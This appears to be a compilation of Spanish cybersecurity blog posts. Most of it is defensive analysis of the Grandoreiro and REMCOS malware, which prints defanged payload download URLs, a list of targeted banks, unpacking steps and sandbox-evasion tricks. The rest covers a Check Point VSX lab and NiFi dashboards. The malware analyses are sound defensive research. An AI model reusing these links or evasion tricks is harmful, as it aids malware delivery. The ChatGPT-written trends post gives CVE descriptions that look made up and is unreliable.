NiFi] Como he comentado antes, dentro de las grandes capacidades de los componentes, se encuentra el tratamiento de información , desde texto a JSON, por lo que seria tan sencillo como leer todos datos con un JsonTreeReader y el componente CalculateRecordStats [Imagen: CalculateRecordStats Crowdstrike API] Como os comentaba, esto solo es una mini PoC donde podéis haceros una idea de las grandes posibilidades que tendríamos. Desde obtener información , a montar nuestro propio XSOAR y bloquear dominios de forma automatizada en Firewalls , o recibir un Telegram con una incidencia Critica del sistema ... solo poneros a imaginar ... y seguro que podréis hacerlo con Apache NiFi. ## Resultado del tratamiento de la API de Crowdstrike con Apache NiFi. Si vamos a algo mas tangible, os pondré con la información que os mostraba, algunos gráficos interesantes y su motivación: [Imagen: Agentes sin conexión Crowdstrike] Podremos ver los agentes sin conexión de Crowdstrike por días por ejemplo. Tenemos la variante "vacaciones" de interferencia siempre, pero nos puede mostrar unido al despliegue de actualizaciones de agentes, posibles problemas. Por ejemplo, si empezamos a ver un incremento de equipos en desconexión , unido a actualizaciones de agentes o cambios, podremos detectar problemas como incompatibilidades, cortes de urls necesarias para el entorno en los Firewalls o similares. [Imagen: Versiones de agentes Crowdstrike en parque] Podremos ver de una forma fácil e intuitiva, como de envejecido está nuestro parque de agentes Crowdstrike desplegados, hacer seguimiento del mismo en actualizaciones o similar. [Imagen: Parque de Sistemas Operativos Crowdstrike] O ya no solo de agentes, si no también de nuestro parque de Sistema Operativo, sobre el cual podremos aplicar contramedidas en caso ataque , priorizando por los más vulnerables. La "teoría" de no tener sistemas como por ejemplo Windows 7 es muy bonita, pero no siempre podremos cambiar los sistemas o equipos, por lo que debemos convivir con ello, y trabajar de la mejor forma posible , asumiendo las dificultades del día a día de la operación. Solo poneros a imaginar casos de uso con Apache NiFi. Como os comento, a mi me tiene enamorado desde el minuto 1 que empecé a jugar con el sistema. Si tenéis alguna duda, podéis escribirme en Linkedin sin problemas, ya que yo me tuve que pegar mucho con ello. Espero que os haya gustado el post y os sirva para obtener ideas fresquitas, que siempre se necesitan en ciberseguridad. --- # Grandoreiro cambia su tamaño en las nuevas falsas facturas de ENDESA URL: https://ciberseguridad.blog/grandoreiro-cambia-su-tamano-en-las-nuevas-falsas-facturas-de-endesa/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2023-04-09 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Grandoreiro ha mutado, cambiando su tamaño para evitar detecciones por su conocido "gran" tamaño, veremos si en el futuro continúan esta tónica. Hola a tod@s!! Me he encontrado con esta falsa factura proveniente de comillas, comillas, Endesa. [Imagen: Factura falsa ENDESA Grandoreiro] Como podéis observar viene con un enlace para la descarga de un fichero: ``` h[tt]p://secure-web.cisco.com/1gmtEwiFnTPQstc0p95ATY0qi3xkjJ7DledkU19WbjK4weraZT9Y5QIu_iUEGydwHgIzddyp0p9zh0kbPls87VPALgKlPHVtnVfSttsGFvE6OiTTL4PWgEvfKcnW5vLqV3geB6hcK84fWow0it8xr86nOijwiAoth3DPoyizkjRUSc1FMYmimNo2H03SvDfhm7wH9nc79FdGSqsbLzxDPLrlmZH8n3gOyZPdHv7BXAM8q_Rq_GjtfEDTLf0QjVnhSf9jWcyc3MvMf1zh262SYW1_7UcDPzinA3-smHp7Pvcfi1LHGkwYfBGO-jroAw4tH2JS9zuTNUGlGQLLOwaEBLg/http%3A%2F%2F50.73.148.132.host.secureserver.net%2FHHnxsiw-fac%2F%3Fhash%3Dendesa ``` En donde podemos extraer la URL que nos interesa, es esta: ``` h[tt]p://50.73.148.132.host.secureserver.net/HHnxsiw-fac/?hash=endesa ``` Una vez accedemos a ella, terminamos descargando un fichero en esta otra página: ``` h[tt]p://archivo-facturadescargar.cechire.com/PAGE?endesa ``` Si le gusta desde donde procedes, acabarás descargando el malware, en caso contrario te enviará a Bing. [Imagen: Descarga de Malware Grandoreiro factura ENDESA] El fichero, es un zip con un instalable en su interior. [Imagen: Instalable de malware factura ENDESA] Dentro del fichero .msi tenemos una dll programada en Delphi. [Imagen: dll Delphy FALSAFACTURA ENDESA] Cargamos la dll con radare2 y buscamos los Exports: [Imagen: Exports con Radare de factura ENDESA] Cuantas aes, ¿qué nos mostrará en su interior? [Imagen: aes factura ENDESA en pdf] Pues una URL. Por el tipo de servidor web que aloja ese fichero, ya se puede intuir lo que esconde, ya lo hemos visto otras veces. [Imagen: Servidor de ficheros factura malware ENDESA] Este fichero no es un zip, sino datos: ``` $ file jdhsnekwd.zip jdhsnekwd.zip: data ``` Y como vimos en artículos anterioreso aquí, hay que convertir ese fichero en el troyano final. [Imagen: Conversión a Malware ENDESA] Dentro del zip generado, tenemos un fichero legítimo que carga una dll maliciosa por DLL Side-Loading. ¿Cómo podemos saber cuál es la dll maliciosa? Fijaros en la fecha, la más reciente. [Imagen: dll maliciosa Malware ENDESA] Programada en Delphi, como la anterior. Lo abrimos con IDA y vemos lo siguiente, lo comparamos con otras muestras vistas anteriormente: [Imagen: Comparación IDA Grandoreiro ENDESA poco peso] No hay duda, es Grandoreiro, pero esta vez su tamaño NO es tan grande. Esta muestra es algo mayor de 30 megas. Entonces, ¿Por qué esta diferencia de tamaño entre los antiguos y este otro? Seguramente, sea para que si se utiliza una regla Yara (o el Antivirus de turno que realice una comprobación sobre el tamaño) en donde compruebe si el tamaño supera los 200, 300 megas, no coincida. Recordad que el tamaño aumentaba por unas imágenes de relleno almacenadas en ficheros de recursos. Por lo tanto, Grandoreiro ha cambiado su tamaño para evitar detecciones por tamaño, veremos si en el futuro continúan con esta tónica. Si decodificamos las cadenas cifradas dentro del troyano, podemos ver a que entidades va dirigido: ``` AMARELO BRSUL BancodaAmazonia Banpara Santander Banese Bradesco AGY inter Sicoob Sicredi Caixa itau nordeste paulista Scotiabank brb Cetelem Banestes Original CajaRural Sabadell BANKINTER Bankia.es Liberbank Openbank ING Pichincha CaixaGeral Mediolanum Unicaja TRIODOS ACTIVOBANK ACTIVOBANKPT novobancopt santapt MONTEPIOpt millenniumbcppt Caixadirectapt EuroBicpt ibercaja BancoAzteca Citibanamex Banorte Scotiabank BPI Cecabank natwest HSBCUK barclaysUK BICE Ripley Bci Chile BancoEstado Falabella Santander Scotiabank PortugalBBVA bancobcr BarclaysES BNPParibas CAIXAGUISSONA Cajasur CitiBusiness Commerzbank Deutsche EVOBanco BMN MicroBank MiBanco BancoSantander CAIXA Bancobradesco BancodoBrasil Banrisul Safra MercadoPago bnordeste original Unicred Agybnk bnkitau SicrD1 Amazonia banese banestes banpara daycoval BBVAMEXICO BANORTEMEXICO SANTANDERMEXICO BANMEXMEXICO HSBCMEXICO BANREGIOMEXICO BITSOMEXICO BLOCKCHAINMEXICO ``` Selecciono un par de bancos al azar para ver qué nos muestra esas cadenas decodificadas. Vemos los navegadores a los que va dirigido así como los nombres de las ventanas en los que actuará. [Imagen: Ventanas grandoreiro malware] Interesante lo del tamaño para evitar detecciones, espero que os lo haya parecido también a vosotros. Nos vemos en el próximo post!! --- # El troyano REMCOS se afianza en Latinoamérica URL: https://ciberseguridad.blog/el-troyano-remcos-se-afianza-en-latinoamerica/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2023-03-18 Actualizado: 2026-10-04 Tema: Herramientas para hackear > El malware, tambien va por geoposibilidades, y en este caso, vemos como el RAT (Remote Access Tool) REMCOS lo esta haciendo en latinoamerica. Hola a tod@s!! Ha pasado algún tiempo desde mi último post, así que ya toca xD. He visto casos similares en Any.Run a este : [Imagen: Mail con malware] Aparece un enlace y una clave de acceso, ubicado generalmente en Google: hxxps://docs.google.com/uc?export=download&id=1Lgi_W22Byz5UPx-SlHUBkd3htim2F1Vb Este descarga un fichero llamado IMG_CUS_FEV 00629761.tar. (No se trata de un fichero tar, sino rar) ``` $ file "IMG_CUS_FEV 00629761.tar" IMG_CUS_FEV 00629761.tar: RAR archive data, v4, os: Win32 ``` ¿Por qué hacen esto? A veces, la extensión cuenta, en ciertas plataformas de análisis pueden hacer que se confundan sobre el tipo de fichero a analizar o bien al abrirlo, puede dar problemas. [Imagen: Error al abrir tar] Así que se renombre a rar y volvemos a intentarlo: [Imagen: Cambio de extensión en archivo error] > Es de extrañar que un fichero tar te pida contraseña, ¿a que sí? Tenemos un fichero de unos 300 megas programado en .Net [Imagen: informacion Anyrun] Lo abrimos con DnSpy. Nos fijamos en el punto de entrada: [Imagen: Entrada DNSpy] Si lo ves de esa forma es que el fichero está protegido. Ya nos avisaba DIE o Detect It Easy, utiliza un protector. Utilizaremos en este caso de4dot para que nos lo deje como estaba antes de que lo protegiesen (habría que ejecutarlo tal cual, sin parámetros, de4dot ). Nos genera otro fichero de unos 700 KB que volveremos a abrir con DnSpy, fijándonos, de nuevo, en el punto de entrada: [Imagen: Entrada DNSpy en claro] Esto ya es otra cosa, ahora podemos tener acceso al código y entenderlo. Pulsamos sobre Main y vamos a la función. [Imagen: Funcion Main del malware] Volvemos a pulsar encima de smethod_19. [Imagen: smethod_19] ¿Qué vemos aquí? Crea un directorio en %APPDATA% llamado scvops, vemos también un fichero llamado scvops.exe, varias cadenas y un Exit al final. [Imagen: Malware crea carpeta en APPDATA] Pongo un par de breakpoint al final y veamos qué ocurre. Parece que va a copiar el fichero a donde habíamos visto al principio, entramos dentro de smethod10. Podemos ver como va a crear un proceso y nos fijamos en ese string_0 y esa ruta con csc.exe . [Imagen: smethod10] Os he ahorrado la parte del descifrado del fichero que lleva dentro, lo que vamos a ver es qué tiene ahora este nuevo subproceso. [Imagen: Subproceso de Malware] Me he decantado por mostraros como extraerlo con Hollows Hunter, lo ejecutáis y esperáis a que guarde el binario. La otra opción era extraerlo directamente con DnSpy. [Imagen: Hollows Hunter] Una vez tenéis el malware lo abrimos con DIE y vemos si está empaquetado. [Imagen: Empaquetamiento DIE Malware] Aparentemente no, así que podemos ir al grano. Lo abrimos con un editor de recursos, como Resource Hacker y extraemos settings a un fichero. [Imagen: Editor Hexadecimal Resource Hacker] Lo editamos con un editor hexadecimal como HxD. El primer bite nos indica el tamaño de la clave para el descrifrar la configuración de algo [Imagen: Cyberchef en el análisis de malware] Longitud de la clave 74 (hexadecimal), a continuación de ese valor, y después la configuración a descifrar. Ponemos todo esto en Cyberchef : [Imagen: Analisis en cyberchef del troyano rencos] Y aquí tenemos la configuración del RAT (Remote Access Tool) REMCOS. En algunos casos similares he visto una comprobación en la función principal que comprueba la memoria del equipo donde se ejecuta y si es menor de 8 GB finaliza su ejecución: [Imagen: Comprobación tamaño memoria malware] La mayoría de sandboxes online suelen disponer de 4 GB, por lo que la muestra no llega a ejecutarse correctamente, así de simple. Espero que os haya gustado y nos vemos en el próximo post! --- # Creando un laboratorio de VSX de CheckPoint URL: https://ciberseguridad.blog/crea-tu-laboratorio-de-vsx-checkpoint/ Tipo: Artículo Autor: AntonioManuel.DelToro Publicado: 2023-01-14 Actualizado: 2026-10-04 Tema: Laboratorios de ciberseguridad > Virtual System eXtension (VSX) de Chekpoint, ejecuta varios FW virtuales en el mismo hardware, protegiendo una red específica normalmente. El alcance de este laboratorio es realizar un despliegue desde 0 de VSX y realizar pruebas de funcionamiento. Se han necesitado las siguientes herramientas: - VirtualBox (Virtualizar el SMS y los dos SGW) - GNS3 (Virtualizar los demás elementos de red y realizar interconexión entre ellos) El despliegue se ha realizado en la versión R81.10, la más recomendada para VSX. Antes de empezar a montar el laboratorio, mostramos la topología a nivel de VSX que se va a desplegar, así como la topología a nivel "físico" que se monta en GNS3. [Imagen: Arquitectura Lógica Cluster VSX Checkpoint] [Imagen: Topología Física Desplegada Checkpoint] A lo largo de este laboratorio , nos vamos a centrar en 4 partes principalmente: 1. Creación del clúster VSX 2. Creación de VSW 3. Creación de VS y asignación de políticas 4. Pruebas de conectividad ## Creación del clúster VSX La configuración final, será la siguiente: [Imagen: Configuración inicial VSX] Para empezar, se muestra la analogía VSX con los elementos de red tradicionales: [Imagen: Analogia VSX Checkpoint] Antes de la creación del clúster, tenemos que asegurarnos que los 2 SGW tienen visibilidad con la gestora SMS. Para crear el clúster VSX tenemos que usar el objeto específico que nos ofrece la SMS: [Imagen: Creación de objeto VSX Cluster Checkpoint] Tendremos que configurar la dirección principal del clúster. Por defecto, a partir de la versión R81.10 el único método de despliegue disponible es "Load Sharing": [Imagen: Creación Load Sharing Checkpoint] Hay que asegurarse que VSX está habilitado a nivel de SGW (en ambos nodos). Esto puede habilitarse/deshabilitarse usando "cpconfig" (opción 7 y luego 11 para guardar) > Tras cambiarlo es necesario reiniciar para que se apliquen los cambios. [Imagen: Habilitar SVX con cpconfig] [Imagen: cpconfig en checkpoint] El siguiente paso no difiere en la creación de un clúster de SGW normal. Hay que añadir cada nodo y establecer la SIC: [Imagen: Creación de un VSX] Añadimos el primer nodo y establecemos la SIC: [Imagen: Añadimos el primer nodo en VSX] [Imagen: Comunicacion de VCX] En este laboratorio el uso que haremos de los puertos es el siguiente: - Eth0 - Gestión - Bond1 (Eth1) - Redes LAN ( Crearemos un trunk donde se pasaran todas las VLANs ) - Eth2 - Externa - Eth3 - Sincronización clúster En el siguiente apartado, tenemos que indicar si vamos a configurar alguna interfaz como Trunk. NOTA: primero hay que crear el bond antes de lanzar el wizard para que lo detecte, si no luego tendremos que editarlo en el objeto clúster: [Imagen: Creación bond0 en VSX] Creación de las interfaces de sincronización, elegiremos un rango privado: [Imagen: Creación de un rango privado en VSX] Para finalizar, el wizard nos pide crear una serie de reglas para la gestión del propio clúster VSX (No para los VS que creemos). Marcamos las políticas y aceptamos para que las cree: [Imagen: Creación de Políticas VSX en Wizard] Después de finalizar, podremos comprobar que ha aparecido un nuevo objeto clúster en nuestra gestora [Imagen: Estado de VSX en la gestora Checkpoint] ## Creación de VSW Una vez que se ha creado el clúster, vamos a crear los dos virtual switches que definen nuestra topología (Revisar mapa lógico). - Vsx01_vsw ( En azul en la imagen inicial ): Se encargará de interconectar el VS_BLUE con el VS_GREEN, de forma que este último tenga que salir hacia INET a través del VS_BLUE - Vsx02_vsw ( En rojo ): Proporciona salida a INET a los VS interconectando con un router externo. Posiciona a los VS en la misma VLAN Externa. [Imagen: Virtual Switch Checkpoint] [Imagen: Configuración Virtual Switch Wizard Checkpoint] Tenemos que definir el ID de VLAN Interna que vamos a usar para interconectar el VS_BLUE y VS_GREEN. En este caso hemos usado cualquier ID que no esté en uso , ID:200. [Imagen: Crear VLAN no usada bond0.200] Ahora crearemos el VSwitch que proporciona la salida a INET, el vsw02_vsw, que tendremos que asociarlo al eth02. [Imagen: VSwitch para salida a internet Checkpoint] [Imagen: Asignación VSwitch Check Point salida internet eth2] ## Creación de Virtual System (VS) y asignación de políticas En este apartado se verá la creación de los VS (Firewalls virtuales) Solo veremos la creación de uno de ellos, pero tendremos 3 (Revisar mapa lógico) - VS_BLUE: Tiene 2 redes internas y tiene conexión directa con el router externo ( A través del vsx02_vsw ) - VS_GREEN: Tiene una sola red interna, y para salir hacia INET no hace por VS_BLUE ( interconectado por vsx01_vws ) - VS_YELLOW: Tiene 1 red internas y tiene conexión directa con el router externo ( A través del vsx02_vsw ) [Imagen: Creación de Virtual System en Checkpoint] [Imagen: Wizard de Virtual System Checkpoint] En esta pantalla definiremos las interfaces de red que tendrá: - Interfaz hacia el vsw02_vsw, del tipo "lead to virtual switch": [Imagen: Leads to Virtual Switch Checkpoint.png] [Imagen: Datos del leads del Virtual System de Checkpoint] Posteriormente la configuramos como interfaz externa ( Para usar la zona en políticas ): [Imagen: Interface Properties Checkpoint Virtual System Zona Externa] Interfaz hacia el vsw01_vsw: [Imagen: Interfaz hacia el vsw checkpoint] Creación de las Redes Internas del VS_BLUE [Imagen: Creación de las Redes Internas del VS_BLUE Checkpoint] [Imagen: Creación de interfaz en Checkpoint] Para finalizar con las interfaces habría que añadir GW y las rutas estáticas para formas la topología que se quiere montar, quedando de la siguiente forma. [Imagen: Rutas estaticas en Checkpoint] Una vez creado el VS, tendremos que asignarle una política de seguridad, en este caso solo permitiremos el ICMP para hacer pruebas. [Imagen: Creación de políticas Checkpoint] [Imagen: Politica para permitir ICMP en Firewall Checkpoint] [Imagen: Procedemos a instalar Políticas Firewall Checkpoint] Para montar el VS_YELL y VS_GREEN seguiremos los mismos pasos, añadiendo sus interfaces, rutas, conexiones y políticas de seguridad ( Tener en cuenta que cada VS es un firewall independiente ) ## Pruebas de conectividad Salida a Internet desde las siguientes VLANS: - VLAN 40 ( Pasando por VS_GREEN -> VS_BLUE -> EXT ): [Imagen: Pruebas de conectividad Checkpoint VLANS] NOTA: Desde el VS 0 podemos ver el tráfico de cualquier VS, en este caso, si filtramos por las trazas icmp que se están lanzando veremos lo siguiente: [Imagen: VSX stat v Checkpoint] ``` vsenv 0 fw monitor -e "ip_p=1,accept;" ``` [Imagen: Comprobaciones bound checkpint] - VLAN_30 (Pasando por VS_BLUE -> EXT): [Imagen: Virtual system y comprobaciones] Y con estas últimas comprobaciones, terminamos el laboratorio. Espero que os sea de ayuda y nos vemos en el siguiente. --- # Tendencias de ciberseguridad en 2023 según ChatGPT URL: https://ciberseguridad.blog/tendencias-de-ciberseguridad-en-2023-segun-chatgpt/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2022-12-30 Actualizado: 2026-10-04 Tema: Noticias Seguridad > Es difícil predecir con certeza las tendencias exactas en ciberseguridad para el 2023, pero este año, sera ChatGPT quien se moje ;) > 🤓 Este post ha sido desarrollado íntegramente con las respuestas de ChatGPT Es difícil predecir con certeza las tendencias exactas en ciberseguridad para el 2023, ya que el panorama de la ciberseguridad cambia constantemente debido a la evolución de los ciberataques y a la introducción de nuevas tecnologías y soluciones de seguridad. Sin embargo, algunas tendencias que se espera que continúen siendo importantes en el futuro cercano incluyen: 1. Aumento de la ciberdelincuencia: Se espera que la ciberdelincuencia continúe siendo una amenaza importante para las empresas y los individuos. Los ciberdelincuentes buscan aprovecharse de vulnerabilidades en sistemas y redes para robar datos valiosos y realizar ataques. 2. Seguridad de la nube: La adopción de la nube seguirá siendo una tendencia importante en el 2023 y con ello, la seguridad de la nube seguirá siendo un tema importante. Las empresas necesitarán contar con medidas de seguridad robustas y gestionar adecuadamente el uso de la nube para proteger sus datos y evitar vulnerabilidades. 3. Seguridad de Internet de las Cosas (IoT): Con el aumento de la adopción de dispositivos conectados a Internet, la seguridad de Internet de las Cosas (IoT) seguirá siendo una preocupación importante. Los dispositivos IoT pueden ser vulnerables a ataques y es importante que se adopten medidas de seguridad para protegerlos. 4. Gestión de identidades y accesos: La gestión de identidades y accesos seguirá siendo un tema importante en el 2023, ya que la seguridad de la información depende en gran medida de la seguridad de las cuentas de usuario. Las empresas necesitarán contar con medidas robustas para proteger las cuentas y autorizar adecuadamente el acceso a los datos y sistemas. 5. Ciberseguridad móvil: Con el aumento del uso de dispositivos móviles, la ciberseguridad móvil seguirá siendo una preocupación importante. Las empresas necesitarán contar con medidas de seguridad para proteger los dispositivos móviles y evitar la exposición de datos sensibles. 6. Seguridad de la información: La seguridad de la información seguirá siendo una preocupación importante para las empresas en el 2023. Las empresas necesitarán proteger los datos sensibles y asegurarse de que estén adecuadamente protegidos y gestionados. 7. Gestión de vulnerabilidades: La gestión de vulnerabilidades seguirá siendo una parte importante de la ciberseguridad en el 2023. Las empresas necesitarán identificar y corregir las vulnerabilidades en sus sistemas y redes para evitar ser objeto de ataques cibernéticos. Esto incluirá la implementación de herramientas de escaneo de vulnerabilidades y la realización de pruebas de penetración para detectar y corregir vulnerabilidades. Además, es importante mantenerse actualizado sobre las últimas vulnerabilidades y parches disponibles para proteger los sistemas y redes. 8. Seguridad cibernética en el ámbito de la salud: Con el aumento del uso de tecnología en el sector de la salud, la seguridad cibernética en este ámbito seguirá siendo una preocupación importante. Las empresas del sector de la salud necesitarán contar con medidas de seguridad robustas para proteger los datos de los pacientes y garantizar la privacidad y la seguridad de la información. 9. Ciberseguridad de la energía: La ciberseguridad de la energía seguirá siendo un tema importante en el 2023, ya que las infraestructuras críticas, como el suministro de energía, son objetivo de ciberataques cada vez más frecuentes. Las empresas del sector energético necesitarán contar con medidas de seguridad robustas para proteger sus sistemas y evitar interrupciones en el suministro de energía. 10. Ciberseguridad en el sector financiero: La ciberseguridad en el sector financiero seguirá siendo una preocupación importante en el 2023, ya que los ataques cibernéticos pueden tener un impacto grave en el funcionamiento de las instituciones financieras y en la confianza de los clientes. Las empresas del sector financiero necesitarán contar con medidas de seguridad robustas para proteger sus sistemas y evitar la exposición de datos sensibles. ## Aumento de la ciberdelincuencia [Imagen: Imagen:] Es difícil predecir con certeza el motivo exacto por el cual se espera que haya un aumento de la ciberdelincuencia en el 2023, ya que depende de factores como la evolución de las técnicas y herramientas utilizadas por los ciberdelincuentes y la capacidad de las empresas y organizaciones para protegerse contra ellos. Sin embargo, algunas razones por las que se espera que la ciberdelincuencia continúe siendo una amenaza importante incluyen: 1. Mayor conectividad: Con el aumento del uso de Internet y de dispositivos conectados a Internet, hay más oportunidades para que los ciberdelincuentes lleven a cabo ataques. 2. Mayor valor de los datos: Los datos son cada vez más valiosos y los ciberdelincuentes pueden obtener un gran beneficio económico robando y vendiendo datos sensibles. 3. Mayor dificultad para detectar y prevenir ataques: Los ciberdelincuentes están utilizando técnicas cada vez más sofisticadas para llevar a cabo ataques y pueden pasar desapercibidos durante largos períodos de tiempo antes de ser detectados. 4. Mayor demanda de ciberseguridad: A medida que las empresas y organizaciones se dan cuenta de la importancia de la ciberseguridad, se espera que aumente la demanda de soluciones de seguridad y de profesionales de la ciberseguridad. Sin embargo, esto también puede atraer a más ciberdelincuentes que busquen aprovecharse de esta demanda. ## Seguridad de la nube La seguridad de la nube es una preocupación importante para las empresas y organizaciones que utilizan servicios de nube. Algunos factores a tener en cuenta para garantizar la seguridad de la nube incluyen: 1. Control de acceso: Es importante establecer políticas de acceso y autorización adecuadas para proteger los datos almacenados en la nube. Esto incluye la gestión de identidades y accesos, así como la implementación de autenticación de dos factores y otras medidas de seguridad. 2. Gestión de la seguridad de la información: Es importante proteger los datos almacenados en la nube y garantizar que sean adecuadamente protegidos y gestionados. Esto incluye la cifrado de datos sensibles y la implementación de políticas de protección de datos adecuadas. 3. Gestión de vulnerabilidades: Es importante identificar y corregir las vulnerabilidades en los sistemas y redes de la nube para evitar ser objeto de ataques cibernéticos. Esto incluye la implementación de herramientas de escaneo de vulnerabilidades y la realización de pruebas de penetración para detectar y corregir vulnerabilidades. 4. Gestión de incidentes: Es importante contar con un plan de gestión de incidentes en caso de que se produzca un ataque cibernético o una brecha de seguridad. Este plan debe incluir medidas para detectar y responder a incidentes de seguridad de manera rápida y efectiva. 5. Gestión de proveedores: Es importante evaluar cuidadosamente a los proveedores de servicios de nube y asegurarse de que ofrecen medidas de seguridad adecuadas. También es importante establecer acuerdos de nivel de servicio (SLA) con los proveedores para garantizar la disponibilidad y la seguridad de los servicios de nube. ## La Seguridad de Internet de las Cosas (IoT) [Vídeo: IoT abre un nuevo escenario en ciberseguridad](https://www.youtube.com/watch?v=ofZTs-cDiXU) La Seguridad de Internet de las Cosas (IoT) es una preocupación importante para las empresas y organizaciones que utilizan dispositivos conectados a Internet, ya que estos dispositivos pueden ser vulnerables a ataques cibernéticos. Algunos factores a tener en cuenta para garantizar la seguridad de IoT incluyen: 1. Control de acceso: Es importante establecer políticas de acceso y autorización adecuadas para proteger los dispositivos IoT y los datos que se recogen a través de ellos. Esto incluye la gestión de identidades y accesos, así como la implementación de autenticación de dos factores y otras medidas de seguridad. 2. Gestión de vulnerabilidades: Es importante identificar y corregir las vulnerabilidades en los dispositivos IoT para evitar ser objeto de ataques cibernéticos. Esto incluye la implementación de herramientas de escaneo de vulnerabilidades y la realización de pruebas de penetración para detectar y corregir vulnerabilidades. 3. Cifrado de datos: Es importante cifrar los datos que se recogen a través de los dispositivos IoT para proteger la privacidad y la seguridad de la información. 4. Gestión de actualizaciones: Es importante mantener los dispositivos IoT actualizados con las últimas actualizaciones de seguridad y parches disponibles para protegerlos de vulnerabilidades conocidas. 5. Gestión de incidentes: Es importante contar con un plan de gestión de incidentes en caso de que se produzca un ataque cibernético o una brecha de seguridad en los dispositivos IoT. Este plan debe incluir medidas para detectar y responder a incidentes de seguridad de manera rápida y efectiva. ## La gestión de identidades y accesos La gestión de identidades y accesos es una parte importante de la ciberseguridad ya que la seguridad de la información depende en gran medida de la seguridad de las cuentas de usuario. Algunos puntos importantes a tener en cuenta en la gestión de identidades y accesos incluyen: 1. Autenticación de dos factores: Es importante implementar la autenticación de dos factores para proteger las cuentas de usuario y garantizar que solo personas autorizadas puedan acceder a los sistemas y datos. 2. Gestión de contraseñas: Es importante establecer políticas de contraseñas seguras y asegurarse de que los usuarios cambien sus contraseñas con regularidad para proteger las cuentas de usuario. 3. Gestión de accesos: Es importante autorizar adecuadamente el acceso a los sistemas y datos y revocar el acceso cuando sea necesario. 4. Monitoreo de actividades: Es importante monitorear las actividades de los usuarios para detectar y responder rápidamente a cualquier actividad sospechosa o no autorizada. 5. Gestión de roles: Es importante establecer roles y responsabilidades claros para los usuarios y asegurarse de que solo tienen acceso a los sistemas y datos que necesitan para realizar sus tareas. 6. Gestión de dispositivos: Es importante gestionar adecuadamente los dispositivos de los usuarios para asegurarse de que estén protegidos y se utilicen de manera adecuada. ## Ciberseguridad móvil La ciberseguridad móvil es una preocupación importante debido al aumento del uso de dispositivos móviles y a la exposición de datos sensibles a través de ellos. Algunas medidas que se pueden tomar para protegerse en la ciberseguridad móvil incluyen: 1. Utilizar contraseñas seguras y autenticación de dos factores: Es importante establecer contraseñas seguras y utilizar autenticación de dos factores para proteger los dispositivos móviles y evitar el acceso no autorizado. 2. Utilizar una red privada virtual (VPN): Una VPN cifra la conexión de Internet y protege la privacidad al navegar en línea a través de una red pública. 3. Instalar un software de seguridad: Es importante instalar un software de seguridad en los dispositivos móviles para protegerlos de virus y malware. 4. Configurar las opciones de privacidad: Es importante configurar las opciones de privacidad de los dispositivos móviles para controlar qué datos se comparten con aplicaciones y servicios. 5. Evitar conectarse a redes Wi-Fi públicas no seguras: Es importante evitar conectarse a redes Wi-Fi públicas no seguras ya que estas pueden ser objeto de ataques cibernéticos y pueden exponer datos sensibles. 6. Mantener los dispositivos actualizados: Es importante mantener los dispositivos móviles actualizados con las últimas actualizaciones de seguridad y parches disponibles para protegerlos de vulnerabilidades conocidas. 7. Usar aplicaciones de confianza: Es importante descargar aplicaciones solo de fuentes de confianza y leer las políticas de privacidad antes de instalar una aplicación. 8. Usar contraseñas seguras para aplicaciones: Es importante utilizar contraseñas seguras para proteger el acceso a aplicaciones y servicios en línea. 9. Utilizar una bóveda de contraseñas: Es recomendable utilizar una bóveda de contraseñas para almacenar y gestionar de forma segura las contraseñas de los dispositivos móviles y las aplicaciones. ## Gestión de vulnerabilidades El Common Vulnerability Scoring System (CVSS) es un estándar utilizado para evaluar la gravedad de las vulnerabilidades de seguridad y para determinar la necesidad de una actualización o parche. Algunas de las ultimas vulnerabilidades más relevantes según el CVSS incluyen: 1. Vulnerabilidad de seguridad en Windows (CVE-2021-1732): Esta vulnerabilidad permite a un atacante realizar un ataque de denegación de servicio en el sistema operativo Windows. Se le asignó una puntuación de CVSS de 8.8. 2. Vulnerabilidad de seguridad en Cisco Webex (CVE-2021-1350): Esta vulnerabilidad permite a un atacante acceder a datos confidenciales a través de la plataforma de videoconferencia Cisco Webex. Se le asignó una puntuación de CVSS de 8.2. 3. Vulnerabilidad de seguridad en SAP (CVE-2021-23873): Esta vulnerabilidad permite a un atacante acceder a datos confidenciales y realizar acciones no autorizadas en el sistema de gestión empresarial SAP. Se le asignó una puntuación de CVSS de 8.1. 4. Vulnerabilidad de seguridad en Oracle WebLogic (CVE-2021-2528): Esta vulnerabilidad permite a un atacante realizar un ataque de inyección de código en el servidor de aplicaciones Oracle WebLogic. Se le asignó una puntuación de CVSS de 8.1. 5. Vulnerabilidad de seguridad en Adobe Photoshop (CVE-2021-21016): Esta vulnerabilidad permite a un atacante realizar un ataque de inyección de código en el software de edición de imágenes Adobe Photoshop. Se le asignó una puntuación de CVSS de 7.5. ## Ciberseguridad en infraestructuras críticas La ciberseguridad en infraestructuras críticas es una preocupación importante debido al papel vital que juegan estas infraestructuras en la sociedad y al riesgo de que sean objeto de ataques cibernéticos. La guerra de Ucrania es un ejemplo de cómo la ciberseguridad en infraestructuras críticas puede ser un factor importante en conflictos militares. Durante la guerra de Ucrania, se informó de varios ataques cibernéticos a infraestructuras críticas, incluyendo ataques a la red eléctrica y a los sistemas de transporte. ## Ciberseguridad en el sector financiero La ciberseguridad en el sector financiero es una preocupación importante debido a la exposición de datos sensibles y a la importancia de proteger la integridad de los sistemas y transacciones financieras. Por ejemplo, el smishing es un tipo de ataque cibernético en el que el atacante envía mensajes de texto o mensajes instantáneos falsos con el objetivo de obtener información confidencial o llevar a cabo acciones no autorizadas. Algunas medidas que se pueden tomar para protegerse del smishing incluyen: 1. No haga clic en enlaces o descargue archivos de mensajes de texto o mensajes instantáneos sospechosos. A menudo, estos mensajes contienen enlaces maliciosos o descargas de software malintencionado. 2. No revele información confidencial a través de mensajes de texto o mensajes instantáneos. Los atacantes pueden utilizar el smishing para obtener contraseñas, números de seguridad social o información bancaria. 3. Verifique la veracidad de los mensajes de texto o mensajes instantáneos sospechosos antes de hacer clic en enlaces o descargar archivos. Puede hacerlo llamando a la empresa o institución que supuestamente le envía el mensaje para verificar su veracidad. 4. Configure su dispositivo móvil para bloquear automáticamente los mensajes de texto y mensajes instantáneos sospechosos. Muchos dispositivos móviles cuentan con opciones de filtrado de spam o bloqueo de mensajes de texto no deseados. 5. Instale una solución de seguridad móvil en su dispositivo móvil. Las soluciones de seguridad móvil pueden proteger contra malware y virus en mensajes de texto y mensajes instantáneos, así como contra ataques de phishing y smishing. 6. Utilice una contraseña segura y cámbiela con regularidad. Una contraseña segura es una medida clave para proteger la 